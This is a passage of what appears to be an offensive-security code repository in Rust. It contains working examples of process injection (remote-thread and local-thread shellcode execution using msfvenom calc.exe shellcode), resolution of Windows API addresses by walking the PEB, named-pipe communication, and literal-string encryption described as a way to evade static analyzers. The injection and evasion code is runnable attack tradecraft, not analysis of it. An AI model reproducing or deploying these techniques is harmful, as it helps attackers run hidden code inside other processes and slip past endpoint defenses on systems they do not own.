to encrypt anything that will not be known at runtime.\n[A] Just like its name suggests, you can only encrypt literal strings. Not variables, raw strings, concatenated strings, or formatted strings.\n[>] Trying to encrypt the same strings but using their defined variables instead of the string literals prints out the value \"unknown\":"); 31 | 32 | println!("\t[+] Downloading evil thing from {}", lc!(payload_url)); 33 | println!("\t[+] Encrypting all ur filez with password: {}", lc!(evil_password)); 34 | 35 | println!("\n[!] Try using strings to find the two other strings in this program, \"Can you see me?\" and \"Or can you see me?\" (other than in this string, of course). Which one is litcrypted?") 36 | 37 | } 38 | 39 | // You can imagine a whole bunch of other evil stuff in here: 40 | 41 | // fn download_and_run_evil_thing() { ..... 42 | 43 | // fn solemly_swear_up_to_no_good() { ...... 44 | 45 | // ... and all of the strings of these functions can use litcrypt to evade static analyzers. 46 | -------------------------------------------------------------------------------- /Named_Pipe_Client/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "Named_Pipe_Client" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = {version = "0.3.9", features = ["winnt","fileapi","minwindef"]} 10 | -------------------------------------------------------------------------------- /Named_Pipe_Client/src/main.rs: -------------------------------------------------------------------------------- 1 | use winapi::um::winnt::{HANDLE,LPCSTR,GENERIC_READ,GENERIC_WRITE}; 2 | use winapi::um::fileapi::{CreateFileA,OPEN_EXISTING,ReadFile}; 3 | use std::ptr::null_mut; 4 | 5 | fn main() { 6 | unsafe { 7 | let mut bytes_read : u32 = 0; 8 | let mut buffer_read = vec![0u8;1024]; 9 | let pipe_name : LPCSTR = "\\\\.\\pipe\\rusttestpipe\0".as_ptr() as *const i8; 10 | let clientpipe : HANDLE = CreateFileA(pipe_name,GENERIC_READ | GENERIC_WRITE,0,null_mut(),OPEN_EXISTING,0,null_mut()); 11 | ReadFile(clientpipe,buffer_read.as_mut_ptr() as *mut winapi::ctypes::c_void,buffer_read.len() as u32,&mut bytes_read,null_mut()); 12 | println!("{}",String::from_utf8_lossy(&mut buffer_read)); 13 | } 14 | } 15 | 16 | 17 | -------------------------------------------------------------------------------- /Named_Pipe_Server/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "Named_Pipe_Server" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = {version = "0.3.9", features = ["winbase","winnt","namedpipeapi","fileapi","winbase"]} 10 | -------------------------------------------------------------------------------- /Named_Pipe_Server/src/main.rs: -------------------------------------------------------------------------------- 1 | use winapi::um::winbase::CreateNamedPipeA; 2 | use winapi::um::winnt::{HANDLE,LPCSTR}; 3 | use winapi::um::namedpipeapi::ConnectNamedPipe; 4 | use winapi::um::fileapi::WriteFile; 5 | use winapi::um::winbase::{PIPE_ACCESS_DUPLEX,PIPE_TYPE_MESSAGE}; 6 | use std::ptr::null_mut; 7 | 8 | fn main() { 9 | let mut bytes_written : u32 = 0; 10 | let message = "RUST IS GOOD FOR OFFSEC\0" ; 11 | let pipe_name : LPCSTR = "\\\\.\\pipe\\rusttestpipe\0".as_ptr() as *const i8; 12 | let server_pipe : HANDLE = unsafe {CreateNamedPipeA(pipe_name,PIPE_ACCESS_DUPLEX,PIPE_TYPE_MESSAGE,1,2048,2048,0,null_mut())}; 13 | unsafe {ConnectNamedPipe(server_pipe,null_mut())}; 14 | println!("Sending message to Pipe"); 15 | unsafe {WriteFile(server_pipe,message.as_ptr() as *const winapi::ctypes::c_void,message.len() as u32,&mut bytes_written,null_mut())}; 16 | } 17 | 18 | -------------------------------------------------------------------------------- /PEB_Walk/Cargo.lock: -------------------------------------------------------------------------------- 1 | # This file is automatically @generated by Cargo. 2 | # It is not intended for manual editing. 3 | version = 3 4 | 5 | [[package]] 6 | name = "PEB_Walk" 7 | version = "0.1.0" 8 | dependencies = [ 9 | "windows-sys", 10 | ] 11 | 12 | [[package]] 13 | name = "windows-sys" 14 | version = "0.36.1" 15 | source = "registry+https://github.com/rust-lang/crates.io-index" 16 | checksum = "ea04155a16a59f9eab786fe12a4a450e75cdb175f9e0d80da1e17db09f55b8d2" 17 | dependencies = [ 18 | "windows_aarch64_msvc", 19 | "windows_i686_gnu", 20 | "windows_i686_msvc", 21 | "windows_x86_64_gnu", 22 | "windows_x86_64_msvc", 23 | ] 24 | 25 | [[package]] 26 | name = "windows_aarch64_msvc" 27 | version = "0.36.1" 28 | source = "registry+https://github.com/rust-lang/crates.io-index" 29 | checksum = "9bb8c3fd39ade2d67e9874ac4f3db21f0d710bee00fe7cab16949ec184eeaa47" 30 | 31 | [[package]] 32 | name = "windows_i686_gnu" 33 | version = "0.36.1" 34 | source = "registry+https://github.com/rust-lang/crates.io-index" 35 | checksum = "180e6ccf01daf4c426b846dfc66db1fc518f074baa793aa7d9b9aaeffad6a3b6" 36 | 37 | [[package]] 38 | name = "windows_i686_msvc" 39 | version = "0.36.1" 40 | source = "registry+https://github.com/rust-lang/crates.io-index" 41 | checksum = "e2e7917148b2812d1eeafaeb22a97e4813dfa60a3f8f78ebe204bcc88f12f024" 42 | 43 | [[package]] 44 | name = "windows_x86_64_gnu" 45 | version = "0.36.1" 46 | source = "registry+https://github.com/rust-lang/crates.io-index" 47 | checksum = "4dcd171b8776c41b97521e5da127a2d86ad280114807d0b2ab1e462bc764d9e1" 48 | 49 | [[package]] 50 | name = "windows_x86_64_msvc" 51 | version = "0.36.1" 52 | source = "registry+https://github.com/rust-lang/crates.io-index" 53 | checksum = "c811ca4a8c853ef420abd8592ba53ddbbac90410fab6903b3e79972a631f7680" 54 | -------------------------------------------------------------------------------- /PEB_Walk/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "PEB_Walk" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | 10 | [dependencies.windows-sys] 11 | version = "0.36.1" 12 | features = [ 13 | "Win32_Foundation", 14 | "Win32_Security", 15 | "Win32_System_Threading", 16 | "Win32_UI_WindowsAndMessaging", 17 | "Win32_System_LibraryLoader", 18 | "Win32_System_Kernel", 19 | "Win32_System_WindowsProgramming", 20 | "Win32_System_SystemServices", 21 | "Win32_System_Diagnostics_Debug" 22 | ] -------------------------------------------------------------------------------- /PEB_Walk/src/main.rs: -------------------------------------------------------------------------------- 1 | use core::arch::asm; 2 | use windows_sys::Win32::UI::WindowsAndMessaging::MB_OK; 3 | use windows_sys::Win32::Foundation::*; 4 | use windows_sys::Win32::System::Threading::PEB; 5 | use windows_sys::Win32::System::WindowsProgramming::LDR_DATA_TABLE_ENTRY; 6 | use windows_sys::Win32::System::SystemServices::{IMAGE_DOS_HEADER, IMAGE_EXPORT_DIRECTORY}; 7 | use windows_sys::Win32::System::Diagnostics::Debug::{IMAGE_NT_HEADERS64, IMAGE_DATA_DIRECTORY}; 8 | use windows_sys::Win32::System::Kernel::LIST_ENTRY; 9 | mod types; 10 | 11 | #[inline] 12 | #[cfg(target_pointer_width = "64")] 13 | pub unsafe fn __readgsqword(offset: types::DWORD) -> types::DWORD64 { 14 | let out: u64; 15 | asm!( 16 | "mov {}, gs:[{:e}]", 17 | lateout(reg) out, 18 | in(reg) offset, 19 | options(nostack, pure, readonly), 20 | ); 21 | out 22 | } 23 | 24 | fn get_module_base_addr(module_name: &str) -> HINSTANCE { 25 | unsafe { 26 | let peb_offset: *const u64 = __readgsqword(0x60) as *const u64; 27 | let rf_peb: *const PEB = peb_offset as * const PEB; 28 | let peb = *rf_peb; 29 | 30 | let mut p_ldr_data_table_entry: *const LDR_DATA_TABLE_ENTRY = (*peb.Ldr).InMemoryOrderModuleList.Flink as *const LDR_DATA_TABLE_ENTRY; 31 | let mut p_list_entry = &(*peb.Ldr).InMemoryOrderModuleList as *const LIST_ENTRY; 32 | 33 | loop { 34 | let buffer = std::slice::from_raw_parts( 35 | (*p_ldr_data_table_entry).FullDllName.Buffer, 36 | (*p_ldr_data_table_entry).FullDllName.Length as usize / 2); 37 | let dll_name = String::from_utf16_lossy(buffer); 38 | if dll_name.to_lowercase().starts_with(module_name) { 39 | let module_base: HINSTANCE = (*p_ldr_data_table_entry).Reserved2[0] as HINSTANCE; 40 | return module_base; 41 | } 42 | if p_list_entry == (*peb.Ldr).InMemoryOrderModuleList.Blink { 43 | println!("Module not found!"); 44 | return 0; 45 | } 46 | p_list_entry = (*p_list_entry).Flink; 47 | p_ldr_data_table_entry = (*p_list_entry).Flink as *const LDR_DATA_TABLE_ENTRY; 48 | } 49 | } 50 | } 51 | 52 | fn get_proc_addr(module_handle: HINSTANCE, function_name: &str) -> FARPROC { 53 | let mut address_array: types::UINT_PTR; 54 | let mut name_array: types::UINT_PTR; 55 | let mut name_ordinals: types::UINT_PTR; 56 | let nt_headers: *const IMAGE_NT_HEADERS64; 57 | let data_directory: *const IMAGE_DATA_DIRECTORY; 58 | let export_directory: *const IMAGE_EXPORT_DIRECTORY; 59 | let dos_headers: *const IMAGE_DOS_HEADER; 60 | unsafe { 61 | dos_headers = module_handle as *const IMAGE_DOS_HEADER; 62 | nt_headers = (module_handle as u64 + (*dos_headers).e_lfanew as u64) as *const IMAGE_NT_HEADERS64; 63 | data_directory = (&(*nt_headers).OptionalHeader.DataDirectory[0]) as *const IMAGE_DATA_DIRECTORY; 64 | export_directory = (module_handle as u64 + (*data_directory).VirtualAddress as u64) as *const IMAGE_EXPORT_DIRECTORY; 65 | address_array = (module_handle as u64 + (*export_directory).AddressOfFunctions as u64) as types::UINT_PTR; 66 | name_array = (module_handle as u64 + (*export_directory).AddressOfNames as u64) as types::UINT_PTR; 67 | name_ordinals = (module_handle as u64 + (*export_directory).AddressOfNameOrdinals as u64) as types::UINT_PTR; 68 | loop { 69 | let name_offest: u32 = *(name_array as *const u32); 70 | let current_function_name = std::ffi::CStr::from_ptr( 71 | (module_handle as u64 + name_offest as u64) as *const i8 72 | ).to_str().unwrap(); 73 | 74 | if current_function_name == function_name { 75 | address_array = address_array + (*(name_ordinals as *const u16) as u64 * (std::mem::size_of::() as u64)); 76 | let fun_addr: FARPROC = std::mem::transmute(module_handle as u64 + *(address_array as *const u32) as u64); 77 | return fun_addr; 78 | } 79 | name_array = name_array + std::mem::size_of::() as u64; 80 | name_ordinals = name_ordinals + std::mem::size_of::() as u64; 81 | } 82 | } 83 | } 84 | 85 | 86 | fn main() { 87 | unsafe{ 88 | println!("[+] Getting base address of kernel32.dll"); 89 | let kernel32_base_address: HINSTANCE = get_module_base_addr("kernel32.dll"); 90 | 91 | println!("[+] Dynamically resolving LoadLibraryA"); 92 | let dn_load_library_a: types::LoadLibraryA = std::mem::transmute(get_proc_addr(kernel32_base_address, "LoadLibraryA")); 93 | 94 | println!("[+] Load user32.dll"); 95 | dn_load_library_a("user32.dll\0".as_ptr()); 96 | 97 | println!("[+] Getting base address of user32.dll"); 98 | let user32_base_address: HINSTANCE = get_module_base_addr("user32.dll"); 99 | 100 | println!("[+] Dynamically resolve MessageBoxA"); 101 | let dn_message_box_a: types::MessageBoxA = std::mem::transmute(get_proc_addr(user32_base_address, "MessageBoxA")); 102 | 103 | dn_message_box_a(0, "Resolved dynamically\0".as_ptr(), "MessageBoxA\0".as_ptr(), MB_OK); 104 | } 105 | } 106 | -------------------------------------------------------------------------------- /PEB_Walk/src/types.rs: -------------------------------------------------------------------------------- 1 | use windows_sys::Win32::Foundation::HWND; 2 | use windows_sys::core::PCSTR; 3 | use std::os::raw::c_ulong; 4 | 5 | pub type DWORD = c_ulong; 6 | pub type __uint64 = u64; 7 | pub type DWORD64 = __uint64; 8 | pub type UINT_PTR = __uint64; 9 | pub type MessageBoxA = unsafe extern "system" fn (HWND, PCSTR, PCSTR, u32) -> i32; 10 | pub type LoadLibraryA = unsafe extern "system" fn (PCSTR) -> i32; -------------------------------------------------------------------------------- /Process_Injection_CreateRemoteThread/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "Process_Injection_CreateThread" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | kernel32-sys = "0.2.2" 10 | winapi = {version = "0.3.9", features = ["winnt"] } 11 | -------------------------------------------------------------------------------- /Process_Injection_CreateRemoteThread/src/main.rs: -------------------------------------------------------------------------------- 1 | extern crate kernel32; 2 | use winapi::um::winnt::{PROCESS_ALL_ACCESS,MEM_COMMIT,MEM_RESERVE,PAGE_EXECUTE_READWRITE}; 3 | use std::ptr; 4 | 5 | fn main() { 6 | let test : [u8;276] = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 7 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 8 | 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, 9 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 10 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 11 | 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, 12 | 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, 13 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, 14 | 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, 15 | 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 16 | 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, 17 | 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, 18 | 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, 19 | 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, 20 | 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, 21 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 22 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, 23 | 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, 24 | 0x63,0x2e,0x65,0x78,0x65,0x00]; 25 | 26 | unsafe { 27 | let mut h = kernel32::OpenProcess(PROCESS_ALL_ACCESS, winapi::shared::ntdef::FALSE.into(), 31736); 28 | let mut addr = kernel32::VirtualAllocEx(h,ptr::null_mut(),test.len() as u64,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE); 29 | let mut n = 0; 30 | kernel32::WriteProcessMemory(h,addr,test.as_ptr() as _, test.len() as u64,&mut n); 31 | let mut hThread = kernel32::CreateRemoteThread(h,ptr::null_mut(),0,Some(std::mem::transmute(addr)), ptr::null_mut(), 0,ptr::null_mut()); 32 | kernel32::CloseHandle(h); 33 | } 34 | } 35 | 36 | -------------------------------------------------------------------------------- /Process_Injection_CreateThread/Cargo.lock: -------------------------------------------------------------------------------- 1 | # This file is automatically @generated by Cargo. 2 | # It is not intended for manual editing. 3 | version = 3 4 | 5 | [[package]] 6 | name = "RustProcInjection" 7 | version = "0.1.0" 8 | dependencies = [ 9 | "argparse", 10 | "clap", 11 | "kernel32-sys", 12 | "winapi 0.3.9", 13 | "winreg", 14 | ] 15 | 16 | [[package]] 17 | name = "argparse" 18 | version = "0.2.2" 19 | source = "registry+https://github.com/rust-lang/crates.io-index" 20 | checksum = "3f8ebf5827e4ac4fd5946560e6a99776ea73b596d80898f357007317a7141e47" 21 | 22 | [[package]] 23 | name = "atty" 24 | version = "0.2.14" 25 | source = "registry+https://github.com/rust-lang/crates.io-index" 26 | checksum = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" 27 | dependencies = [ 28 | "hermit-abi", 29 | "libc", 30 | "winapi 0.3.9", 31 | ] 32 | 33 | [[package]] 34 | name = "autocfg" 35 | version = "1.1.0" 36 | source = "registry+https://github.com/rust-lang/crates.io-index" 37 | checksum = "d468802bab17cbc0cc575e9b053f41e72aa36bfa6b7f55e3529ffa43161b97fa" 38 | 39 | [[package]] 40 | name = "bitflags" 41 | version = "1.3.2" 42 | source = "registry+https://github.com/rust-lang/crates.io-index" 43 | checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a" 44 | 45 | [[package]] 46 | name = "clap" 47 | version = "3.1.5" 48 | source = "registry+https://github.com/rust-lang/crates.io-index" 49 | checksum = "ced1892c55c910c1219e98d6fc8d71f6bddba7905866ce740066d8bfea859312" 50 | dependencies = [ 51 | "atty", 52 | "bitflags", 53 | "indexmap", 54 | "os_str_bytes", 55 | "strsim", 56 | "termcolor", 57 | "textwrap", 58 | ] 59 | 60 | [[package]] 61 | name = "hashbrown" 62 | version = "0.11.2" 63 | source = "registry+https://github.com/rust-lang/crates.io-index" 64 | checksum = "ab5ef0d4909ef3724cc8cce6ccc8572c5c817592e9285f5464f8e86f8bd3726e" 65 | 66 | [[package]] 67 | name = "hermit-abi" 68 | version = "0.1.19" 69 | source = "registry+https://github.com/rust-lang/crates.io-index" 70 | checksum = "62b467343b94ba476dcb2500d242dadbb39557df889310ac77c5d99100aaac33" 71 | dependencies = [ 72 | "libc", 73 | ] 74 | 75 | [[package]] 76 | name = "indexmap" 77 | version = "1.8.0" 78 | source = "registry+https://github.com/rust-lang/crates.io-index" 79 | checksum = "282a6247722caba404c065016bbfa522806e51714c34f5dfc3e4a3a46fcb4223" 80 | dependencies = [ 81 | "autocfg", 82 | "hashbrown", 83 | ] 84 | 85 | [[package]] 86 | name = "kernel32-sys" 87 | version = "0.2.2" 88 | source = "registry+https://github.com/rust-lang/crates.io-index" 89 | checksum = "7507624b29483431c0ba2d82aece8ca6cdba9382bff4ddd0f7490560c056098d" 90 | dependencies = [ 91 | "winapi 0.2.8", 92 | "winapi-build", 93 | ] 94 | 95 | [[package]] 96 | name = "libc" 97 | version = "0.2.119" 98 | source = "registry+https://github.com/rust-lang/crates.io-index" 99 | checksum = "1bf2e165bb3457c8e098ea76f3e3bc9db55f87aa90d52d0e6be741470916aaa4" 100 | 101 | [[package]] 102 | name = "memchr" 103 | version = "2.4.1" 104 | source = "registry+https://github.com/rust-lang/crates.io-index" 105 | checksum = "308cc39be01b73d0d18f82a0e7b2a3df85245f84af96fdddc5d202d27e47b86a" 106 | 107 | [[package]] 108 | name = "os_str_bytes" 109 | version = "6.0.0" 110 | source = "registry+https://github.com/rust-lang/crates.io-index" 111 | checksum = "8e22443d1643a904602595ba1cd8f7d896afe56d26712531c5ff73a15b2fbf64" 112 | dependencies = [ 113 | "memchr", 114 | ] 115 | 116 | [[package]] 117 | name = "strsim" 118 | version = "0.10.0" 119 | source = "registry+https://github.com/rust-lang/crates.io-index" 120 | checksum = "73473c0e59e6d5812c5dfe2a064a6444949f089e20eec9a2e5506596494e4623" 121 | 122 | [[package]] 123 | name = "termcolor" 124 | version = "1.1.3" 125 | source = "registry+https://github.com/rust-lang/crates.io-index" 126 | checksum = "bab24d30b911b2376f3a13cc2cd443142f0c81dda04c118693e35b3835757755" 127 | dependencies = [ 128 | "winapi-util", 129 | ] 130 | 131 | [[package]] 132 | name = "textwrap" 133 | version = "0.15.0" 134 | source = "registry+https://github.com/rust-lang/crates.io-index" 135 | checksum = "b1141d4d61095b28419e22cb0bbf02755f5e54e0526f97f1e3d1d160e60885fb" 136 | 137 | [[package]] 138 | name = "winapi" 139 | version = "0.2.8" 140 | source = "registry+https://github.com/rust-lang/crates.io-index" 141 | checksum = "167dc9d6949a9b857f3451275e911c3f44255842c1f7a76f33c55103a909087a" 142 | 143 | [[package]] 144 | name = "winapi" 145 | version = "0.3.9" 146 | source = "registry+https://github.com/rust-lang/crates.io-index" 147 | checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" 148 | dependencies = [ 149 | "winapi-i686-pc-windows-gnu", 150 | "winapi-x86_64-pc-windows-gnu", 151 | ] 152 | 153 | [[package]] 154 | name = "winapi-build" 155 | version = "0.1.1" 156 | source = "registry+https://github.com/rust-lang/crates.io-index" 157 | checksum = "2d315eee3b34aca4797b2da6b13ed88266e6d612562a0c46390af8299fc699bc" 158 | 159 | [[package]] 160 | name = "winapi-i686-pc-windows-gnu" 161 | version = "0.4.0" 162 | source = "registry+https://github.com/rust-lang/crates.io-index" 163 | checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" 164 | 165 | [[package]] 166 | name = "winapi-util" 167 | version = "0.1.5" 168 | source = "registry+https://github.com/rust-lang/crates.io-index" 169 | checksum = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178" 170 | dependencies = [ 171 | "winapi 0.3.9", 172 | ] 173 | 174 | [[package]] 175 | name = "winapi-x86_64-pc-windows-gnu" 176 | version = "0.4.0" 177 | source = "registry+https://github.com/rust-lang/crates.io-index" 178 | checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" 179 | 180 | [[package]] 181 | name = "winreg" 182 | version = "0.10.1" 183 | source = "registry+https://github.com/rust-lang/crates.io-index" 184 | checksum = "80d0f4e272c85def139476380b12f9ac60926689dd2e01d4923222f40580869d" 185 | dependencies = [ 186 | "winapi 0.3.9", 187 | ] 188 | -------------------------------------------------------------------------------- /Process_Injection_CreateThread/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "RustProcInjection" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | kernel32-sys = "0.2.2" 10 | winapi = {version = "0.3.8", features=[ 11 | "winnt", 12 | "memoryapi", 13 | "errhandlingapi", 14 | "processthreadsapi", 15 | "synchapi", 16 | "winbase", 17 | "handleapi", 18 | "libloaderapi" 19 | ]} 20 | winreg = "0.10" 21 | argparse = "0.2.2" 22 | clap = "3.1.5" -------------------------------------------------------------------------------- /Process_Injection_CreateThread/src/main.rs: -------------------------------------------------------------------------------- 1 | use winapi::um::winnt::{PVOID, PROCESS_ALL_ACCESS,MEM_COMMIT,MEM_RESERVE,PAGE_EXECUTE_READWRITE, PAGE_READWRITE, PAGE_EXECUTE_READ}; 2 | use std::ptr; 3 | use std::io; 4 | use std::io::prelude::*; 5 | use std::io::{stdin, stdout, Read, Write}; 6 | use winapi::um::errhandlingapi; 7 | use winapi::um::processthreadsapi; 8 | use winapi::um::winbase; 9 | use winapi::um::synchapi::WaitForSingleObject; 10 | use std::process; 11 | 12 | type DWORD = u32; 13 | 14 | 15 | fn breakpoint() { 16 | let mut stdout = stdout(); 17 | stdout.write(b"[*] Press Enter to continue...\n").unwrap(); 18 | stdout.flush().unwrap(); 19 | stdin().read(&mut [0]).unwrap(); 20 | } 21 | 22 | fn main(){ 23 | create_thread() 24 | } 25 | 26 | fn create_thread() { 27 | 28 | //┌──(kali㉿kali)-[~/Desktop] 29 | //└─$ msfvenom -p windows/x64/exec CMD="calc.exe" -f csharp 30 | let test : [u8;276] = 31 | [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 32 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 33 | 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, 34 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 35 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 36 | 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, 37 | 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, 38 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, 39 | 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, 40 | 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 41 | 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, 42 | 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, 43 | 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, 44 | 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, 45 | 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, 46 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 47 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, 48 | 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, 49 | 0x63,0x2e,0x65,0x78,0x65,0x00]; 50 | 51 | 52 | // allocate base addr as RW 53 | unsafe{ 54 | let base_addr = kernel32::VirtualAlloc( 55 | ptr::null_mut(), 56 | test.len().try_into().unwrap(), 57 | MEM_COMMIT | MEM_RESERVE, 58 | PAGE_READWRITE 59 | ); 60 | 61 | if base_addr.is_null() { 62 | println!("[-] Couldn't allocate memory to current proc.") 63 | } else { 64 | println!("[+] Allocated memory to current proc."); 65 | } 66 | 67 | breakpoint(); 68 | 69 | // copy shellcode into mem 70 | println!("[*] Copying Shellcode to address in current proc."); 71 | 72 | breakpoint(); 73 | 74 | std::ptr::copy(test.as_ptr() as _, base_addr, test.len()); 75 | 76 | println!("[*] Copied..."); 77 | 78 | breakpoint(); 79 | 80 | // Flip mem protections from RW to RX with VirtualProtect. Dispose of the call with `out _` 81 | 82 | println!("[*] Changing mem protections to RX..."); 83 | 84 | let mut old_protect: DWORD = PAGE_READWRITE; 85 | 86 | let mem_protect = kernel32::VirtualProtect ( 87 | base_addr, 88 | test.len() as u64, 89 | PAGE_EXECUTE_READ, 90 | &mut old_protect 91 | ); 92 | 93 | if mem_protect == 0 { 94 | let error = errhandlingapi::GetLastError(); 95 | println!("[-] Error: {}", error.to_string()); 96 | process::exit(0x0100); 97 | } 98 | 99 | breakpoint(); 100 | 101 | // Call CreateThread 102 | println!("[*] Calling CreateThread..."); 103 | 104 | let mut tid = 0; 105 | let ep: extern "system" fn(PVOID) -> u32 = { std::mem::transmute(base_addr) }; 106 | 107 | let h_thread = processthreadsapi::CreateThread( 108 | ptr::null_mut(), 109 | 0, 110 | Some(ep), 111 | ptr::null_mut(), 112 | 0, 113 | &mut tid 114 | ); 115 | 116 | if h_thread.is_null() { 117 | let error = unsafe { errhandlingapi::GetLastError() }; 118 | println!("{}", error.to_string()) 119 | 120 | } else { 121 | println!("[+] Thread Id: {}", tid) 122 | } 123 | 124 | // CreateThread is not a blocking call, so we wait on the thread indefinitely with WaitForSingleObject. This blocks for as long as the thread is running 125 | 126 | breakpoint(); 127 | 128 | println!("[*] Calling WaitForSingleObject..."); 129 | 130 | let status = WaitForSingleObject(h_thread, winbase::INFINITE); 131 | if status == 0 { 132 | println!("[+] Good!") 133 | } else { 134 | let error = errhandlingapi::GetLastError(); 135 | println!("{}", error.to_string()) 136 | } 137 | } 138 | } 139 | -------------------------------------------------------------------------------- /Process_Injection_Self_EnumSystemGeoID/Cargo.lock: -------------------------------------------------------------------------------- 1 | # This file is automatically @generated by Cargo. 2 | # It is not intended for manual editing. 3 | version = 3 4 | 5 | [[package]] 6 | name = "enum_system_geo_id" 7 | version = "0.1.0" 8 | dependencies = [ 9 | "kernel32-sys", 10 | "winapi 0.3.9", 11 | ] 12 | 13 | [[package]] 14 | name = "kernel32-sys" 15 | version = "0.2.2" 16 | source = "registry+https://github.com/rust-lang/crates.io-index" 17 | checksum = "7507624b29483431c0ba2d82aece8ca6cdba9382bff4ddd0f7490560c056098d" 